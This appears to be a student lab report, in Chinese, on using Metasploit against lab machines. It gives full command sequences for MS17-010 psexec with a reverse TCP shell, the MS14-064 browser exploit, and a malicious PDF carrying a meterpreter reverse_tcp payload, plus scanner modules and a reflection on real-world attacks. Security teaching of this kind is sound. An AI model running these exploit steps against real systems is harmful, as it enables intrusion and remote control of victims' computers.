ms17_010_psexec(√) 不惟一shell
ms14_064_ole_lode_execution(√)不惟一windows
scanner/http/ssl_version(√)不惟一瀏覽器
scanner/portscan/tcp (√)不惟一網絡
scanner/oracle/tnslsnr_version (√)惟一session
msf > use exploit/windows/smb/ms17_010_psexec msf exploit(windows/smb/ms17_010_psexec) > show payloads msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回連 msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻擊機ip msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻擊端口 msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶機ip,特定漏洞端口已經固定 msf exploit(windows/smb/ms17_010_psexec) > run //攻擊
msfconsole msf > use windows/browser/ms14_064_ole_code_execution set payload windows/meterpreter/reverse_tcp //http反向回連 set LHOST 192.168.153.135//攻擊機ip set Lport 5237//攻擊端口固定 exploit //攻擊
能夠看到生成的一個URL:http://192.168.153.135:8080/YT1IHT
oracle
在XP的IE上點開後:
tcp
回到Kali,查看sessions,輸入sessions -i 4後,發現攻擊成功,得到shell功能
編碼
search Adobe set payload windows/meterpreter/reverse_tcp set LHOST 192.168.153.135 set LPORT 5237 set filename 20165237.pdf exploit
找到pdf文件(要打開顯示隱藏文件選項)3d
back use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.153.135 set LPORT 5237 exploit
接着在xp中點開pdf文件,回到kali,發現回傳了一些東西。
code
查看sessions,輸入session -i 1,發現攻擊成功,可使用shell。
tcp掃描成功:
ssl版本模塊掃描成功:
OracleSQL的監聽服務攻擊成功:
exploit:針對靶機的漏洞,利用靶機中的後門,對靶機進行攻擊。
payload:能夠實現任何運行在受害者環境中的程序所能作的事情,而且可以執行動做包括破壞文件刪除文件,向病毒的做者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的後門。說白了就是傳送到靶機上的用來攻擊的惡意代碼。
encode:對payload進行編碼
離實戰還缺些什麼技術或步驟?
一、在實踐中發現MSF攻擊的侷限性很大,其中的漏洞幾乎都是針對win XP系統,而實際應用的系統大部分是win7及以上的系統,若是須要實戰攻擊win7及以上的系統,還須要不斷髮現併成功利用新的漏洞。
二、須要提升掃描等信息收集技術,信息收集是作攻擊的重要前提,但大多數初級的掃描都會被win7及以上的系統發現甚至拒絕,因此提供相應的技術很重要。
感想:
此次實驗花費了不少時間去查找能攻擊成功的漏洞,可是讓我對於msf更加熟練,甚至更加崇拜,但願之後可以使用它更多的領域。